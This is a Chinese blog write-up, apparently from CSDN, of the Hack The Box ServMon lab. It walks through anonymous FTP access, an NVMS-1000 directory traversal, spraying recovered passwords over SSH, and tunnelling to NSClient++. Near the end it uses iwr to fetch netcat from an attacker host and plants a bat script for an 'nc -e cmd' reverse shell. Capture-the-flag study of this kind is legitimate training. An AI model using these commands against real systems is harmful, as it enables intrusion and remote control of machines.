• 【Hack The Box】windows练习-- ServMon


    HTB 学习笔记

    Hack The Box】windows练习-- ServMon


    🔥系列专栏:Hack The Box
    🎉欢迎关注🔎点赞👍收藏⭐️留言📝
    📆首发时间:🌴2022年9月7日🌴
    🍭作者水平很有限,如果发现错误,还望告知,感谢!

    在这里插入图片描述

    信息收集

    21/tcp   open  ftp           Microsoft ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_02-27-22  10:08PM       <DIR>          Users
    | ftp-syst: 
    |_  SYST: Windows_NT
    22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
    80/tcp   open  http
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds?
    5666/tcp open  tcpwrapped
    6699/tcp open  napster?
    8443/tcp open  ssl/https-alt
    | ssl-cert: Subject: commonName=localhost
    | Not valid before: 2020-01-14T13:24:20
    |_Not valid after:  2021-01-13T13:24:20
    |_ssl-date: TLS randomness does not represent time
    | fingerprint-strings: 
    |   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
    |     HTTP/1.1 404
    |     Content-Length: 18
    |     Document not found
    |   GetRequest: 
    |     HTTP/1.1 302
    |     Content-Length: 0
    |     Location: /index.html
    |     workers
    |_    jobs
    | http-title: NSClient++
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29

    把这几个先枚举了,发现啥也干不了
    就看ftp因为可以匿名登陆
    所以进去看看有没有信息
    在这里插入图片描述在这里插入图片描述在这里插入图片描述首先就是两个用户名,然后还有一个密码文件得去找找,但是ftp里刚才也没看到啊

    在这里插入图片描述

    在这里插入图片描述
    尝试了一下目录遍历,但是啥都没搞出来
    于是去谷歌搜了一下这个NVMS-1000
    然后搜到了一个目录遍历

    目录遍历

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    整了这么多个密码,做个密码本,用户名本就用那两个人就行

    1nsp3ctTh3Way2Mars!
    Th3r34r3To0M4nyTrait0r5!
    B3WithM30r4ga1n5tMe
    L1k3B1gBut7s@W0rk
    0nly7h3y0unGWi11F0l10w
    IfH3s4b0Utg0t0H1sH0me
    Gr4etN3w5w17hMySk1Pa5$
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    登陆

    crackmapexec ssh 10.129.227.75 -u user.txt -p pass.txt
    
    • 1

    在这里插入图片描述
    账号密码如下

    nadine / L1k3B1gBut7s@W0rk
    
    • 1

    登陆之后,先进行内核之类的枚举
    在这里插入图片描述然后在这里发现了一个可以的服务,program fils也是必须查看的目录
    而且我们在之前看到的那个note中,也能看到相关信息

    在这里插入图片描述进去以后,看到了一个ini文件
    ini就相当于linux中的config文件,我是这么认为的

    在这里插入图片描述然后就发现了一个密码,并且在下面还能看到是只允许本地登陆
    在这里插入图片描述是8443
    在这里插入图片描述

    ssh隧道搭建

    ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443
    
    • 1

    在这里插入图片描述

     iwr http://10.10.14.52:8000/nc64.exe -Outfile C:\Temp\nc.exe 
     bat脚本编写是这样的
     \Temp\nc.exe 10.10.14.13 8888 -e cmd
    
    • 1
    • 2
    • 3

    登陆本地8443,按图配置,value树枝都会上传脚本以及nc,来反弹端口在这里插入图片描述
    在这里插入图片描述
    我们现在将通过在调度程序中添加一个新部分来重复该过程,路径如下 /settings/scheduler 。 现在将 shell 的键和值设置为 interval = 1m 并添加更改。
    在这里插入图片描述

  • 相关阅读:
    【qml】 QML属性绑定的三种方法
    外卖项目(SpringBoot)--- 数据表设计、创建项目工程、登录模块
    Python教程:随机函数,开始猜英文单词的游戏
    Springboot实现登录功能(token、redis、登录拦截器、全局异常处理)
    【免杀前置课——Windows编程】十五、网络编程——C/S,B/S模式分别是什么?WinSocket、Socket传输的定义和其特点、实现简易通信(附代码)
    【三维目标检测】PointRCNN(一)
    进程入门与PCB基础知识.
    5、设计模式之工厂模式
    虚拟机复制后,无法ping通问题解决
    SQLite Write-ahead Logging
  • 原文地址:https://blog.csdn.net/weixin_65527369/article/details/127680390